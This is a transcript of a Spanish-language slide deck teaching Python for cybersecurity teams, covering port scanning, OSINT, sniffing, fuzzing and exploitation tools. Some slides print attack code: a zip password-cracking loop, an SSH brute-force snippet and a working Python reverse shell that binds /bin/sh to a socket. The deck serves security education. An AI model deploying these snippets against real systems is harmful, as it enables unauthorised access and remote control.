Python para equipos de ciberseguridad

Transcript

1. www.sti-innsbruck.at Python para equipos de ciberseguridad @jmortegac

2. About me 2 http://jmortega.github.io/

3. About me 3 https://www.youtube.com/c/JoseManuelOrtegadev/

4. Books 4 • Introducción al desarrollo seguro • Aspectos fundamentales

   de desarrollo seguro • Herramientas OWASP • Seguridad en aplicaciones Android • Seguridad en proyectos NodeJS • Seguridad en proyectos Python • Análisis estático y dinámico en aplicaciones C/C++ • Metodologías de desarrollo

5. Books 5

6. Formación 6 https://www.adrformacion.com/cursos/pythonseg/pythonseg.html

7. Agenda • Introducción a Python para proyectos de ciberseguridad •

   Herramientas de pentesting • Herramientas Python desde el punto de vista defensivo • Herramientas Python desde el punto de vista ofensivo 7

8. Python para proyectos de ciberseguridad 8 1. Diseñado para la

   creación rápida de prototipos 2. Estructura simple y limpia, mejora la legibilidad y facilidad de uso. 3. Amplia biblioteca, también facilidad de interconexión 4. Ampliamente adoptado, la mayoría de las distribuciones de Linux lo instalan por defecto.

9. Python para proyectos de ciberseguridad 9

10. Herramientas de pentesting 10 import boto3 aws_access_key_id = '' aws_secret_access_key

    = '' region_name = 'ap-southeast-2' session = boto3.session.Session(aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, region_name=region_name) ec2client = session.client('ec2') client_instance = ec2client.run_instances( ImageId='ami-30041c53', KeyName='Keys', MinCount=1, MaxCount=1, InstanceType='t2.micro') https://aws.amazon.com/es/sdk-for-python/

11. Herramientas de pentesting 11

12. Herramientas de pentesting 12 import re input_ip = input('Enter the

    ip:') flag = 0 pattern = "^\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}$" match = re.match(pattern, input_ip) if (match): field = input_ip.split(".") for i in range(0, len(field)): if (int(field[i]) < 256): flag += 1 else: flag = 0 if (flag == 4): print("valid ip") else: print('No match for ip or not a valid ip') https://docs.python.org/3/library/re.html

13. Herramientas de pentesting 13

14. Herramientas de pentesting 14 import nmap nma = nmap.PortScannerAsync() def

    callback_function(host, scan_result): print('RESULTADO ==>') print(host, scan_result) nma.scan(hosts='127.0.0.1', arguments='-sC -Pn', callback=callback_function) while nma.still_scanning(): print("Esperando a que termine el escaneo ...") nma.wait(2) https://pypi.org/project/python-nmap/

15. Basic Networking 15

16. Port Scanning 16

17. Port Scanning 17

18. Port Scanning 18 import socket from concurrent import futures def

    check_port(targetIp, portNumber, timeout): TCPsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) TCPsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) TCPsock.settimeout(timeout) try: TCPsock.connect((targetIp, portNumber)) return (portNumber) except: return def port_scanner(targetIp, timeout): threadPoolSize = 500 portsToCheck = 10000 executor = futures.ThreadPoolExecutor(max_workers=threadPoolSize) checks = [ executor.submit(check_port, targetIp, port, timeout) for port in range(0, portsToCheck, 1) ] for response in futures.as_completed(checks): if (response.result()): print('Listening on port: {}'.format(response.result()))

19. Port Scanning 19

20. Banner Grabing 20

21. Scraping 21 • Requests ◦ https://docs.python-requests.org/en/master ◦ Peticiones HTTP •

    BeautifulSoup ◦ https://www.crummy.com/software/BeautifulSou p/bs4/doc ◦ Parser XML,HTML • Scrapy ◦ https://scrapy.org ◦ Framework de scraping

22. Scraping 22 #!/bin/python from bs4 import BeautifulSoup import requests url

    = input("Enter a website to extract the URL's from: ") response = requests.get("http://" +url) data = response.text soup = BeautifulSoup(data) for link in soup.find_all('a'): print(link.get('href'))

23. Scrapy 23

24. Extracción de subdominios 24 • https://github.com/1N3/BlackWidow

25. OSINT 25 • Recon-ng ◦ https://github.com/lanmaster53/recon-ng ◦ Framework para realizar

    reconocimientos basados en web. • Belati ◦ https://github.com/aancw/Belati ◦ Recopilación de datos y documentos públicos y del sitio web y otros servicios. • Pwndb ◦ https://github.com/davidtavarez/pwndb ◦ Buscar credenciales filtradas

26. wig - WebApp Information Gatherer 26

27. wig - WebApp Information Gatherer 27

28. Belati 28

29. Belati 29

30. Reconspider 30 • https://github.com/bhavsec/reconspider

31. Reconspider 31

32. SpiderFoot 32

33. RED TEAM vs BLUE TEAM 33

34. SQLMap 34 • https://sqlmap.org

35. SQLMap 35

36. PwnXSS 36

37. Fuzzing 37 • Wfuzz ◦ https://github.com/xmendez/wfuzz/ ◦ Web fuzzer framework

    • Pyfuzz ◦ https://github.com/AyoobAli/pyfuzz ◦ Fuzzing para descubrir archivos / directorios ocultos

38. Fuxi Scanner 38 • https://github.com/jeffzh3ng/fuxi

39. Fuxi Scanner 39

40. Sniffing de paquetes 40 import socket import struct def ethernet_frame(data):

    dest_mac, src_mac, proto = struct.unpack('! 6s 6s H', data[:14]) return format_mac_addr(dest_mac), format_mac_addr(src_mac), socket.htons(proto), data[14:] def format_mac_addr(bytes_addr): bytes_str = map('{:02x}'.format, bytes_addr) return ':'.join(bytes_str).upper() def main(): conn = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(3)) while True: raw_data, addr = conn.recvfrom(65535) dest_mac, src_mac, eth_proto, data = ethernet_frame(raw_data) if eth_proto == 8: print('\nEthernet Frame:') print('Destination: {}, Source: {}, Protocol: {}'.format(dest_mac, src_mac, eth_proto)) print(data) if __name__ == "__main__": main()

41. Manipulación de paquetes 41 • Scapy ◦ https://scapy.net ◦ Manipulación

    y decodificación de paquetes. ◦ Enviar, rastrear, diseccionar y falsificar paquetes de red.

42. Manipulación de paquetes 42 from scapy.all import * packetCount =

    0 def customAction(packet): global packetCount packetCount += 1 return "{}) {} → {}".format(packetCount, packet[0][1].src, packet[0][1].dst) ## Setup sniff, filtering for IP traffic sniff(filter="ip",prn=customAction)

43. Manipulación de paquetes 43 from scapy.all import ICMP from scapy.all

    import IP from scapy.all import sr1 from scapy.all import ls if __name__ == "__main__": dest_ip = "www.google.com" ip_layer = IP(dst = dest_ip) print(ls(ip_layer)) # displaying complete layer info # accessing the fields print("Destination = ", ip_layer.dst) print("Summary = ",ip_layer.summary())

44. Sniffing de paquetes 44 from scapy.all import * def main():

    sniff(prn=http_header, filter="tcp port 80") def http_header(packet): http_packet=str(packet) if http_packet.find('GET'): return print_packet(packet) def print_packet(packet1): ret = "-------------------------------[ Received Packet ] -------------------------------\n" ret += "\n".join(packet1.sprintf("{Raw:%Raw.load%}\n").split(r"\r\n")) ret += "---------------------------------------------------------------------------------\n" return ret if __name__ == '__main__': main()

45. Explotación 45 • Pacu ◦ https://github.com/RhinoSecurityLabs/pacu ◦ Framework de explotación

    de AWS • AWS Pwn ◦ https://github.com/dagrz/aws_pwn ◦ Colección de scripts de pruebas de penetración de AWS

46. Explotación 46 • CrackMapExec ◦ https://github.com/byt3bl33d3r/CrackMapExec ◦ Mapeo de la

    red, obtiene credenciales y ejecuta comandos. • DeathStar ◦ https://github.com/byt3bl33d3r/DeathStar ▪ Permite automatizar la escalada de privilegios en un entorno Active Directory.

47. Password cracking 47 import zipfile import time encrypted_filename= "secret_file.zip" zFile

    = zipfile.ZipFile(encrypted_filename, "r") passFile = open("passwords.txt", "r") for line in passFile.readlines(): test_password = line.strip("\n").encode('utf-8') try: print(test_password) zFile.extractall(pwd=test_password) print("Match found") break except Exception as err: pass

48. SSH brute force 48 import paramiko ssh = paramiko.SSHClient() ssh.load_system_host_keys()

    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(‘127.0.0.1', username=‘user', password=‘password') stdin,stdout,stderr = ssh.exec_command("uname -a")

49. SSH brute force 49

50. Ejecución de procesos 50 https://docs.python.org/3/library/subprocess.html import subprocess subprocess.run('ls -la', shell=True)

    subprocess.run(['ls', '-la'])

51. Ejecución de procesos 51 https://docs.python.org/3/library/subprocess.html import subprocess process = subprocess.run(['which',

    'python3'], capture_output=True) if process.returncode != 0: raise OSError('Sorry python3 is not installed') python_bin = process.stdout.strip() print(f'Python found in: {python_bin}') CompletedProcess(args=['which', 'python3'], returncode=0, stdout=b'/usr/bin/python3\n', stderr=b'')

52. Ejecución de procesos 52 https://docs.python.org/3/library/subprocess.html from pathlib import Path import

    subprocess source = Path("/home/linux") cmd = ["ls", "-l", source] proc = subprocess.Popen(cmd, stdout=subprocess.PIPE) stdout, stderr = proc.communicate() print(stdout.decode("utf-8").split('\n')[:-1]) <subprocess.Popen object at 0x7f9d714bf9b0>

53. Shell inversa 53

54. Shell inversa 54 #!/usr/bin/python import socket import subprocess import os

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(("127.0.0.1", 45679)) os.dup2(sock.fileno(),0) os.dup2(sock.fileno(),1) os.dup2(sock.fileno(),2) shell_remote = subprocess.call(["/bin/sh", "-i"]) #proc = subprocess.call(["/bin/ls", "-i"])

55. Books 55

56. Books 56 https://github.com/PacktPublis hing/Python-Ethical-Hacking https://github.com/PacktPub lishing/Python-for-Offensive -PenTest

57. GitHub repository 57 https://github.com/jmortega/python_ciberseguridad_2021

58. 58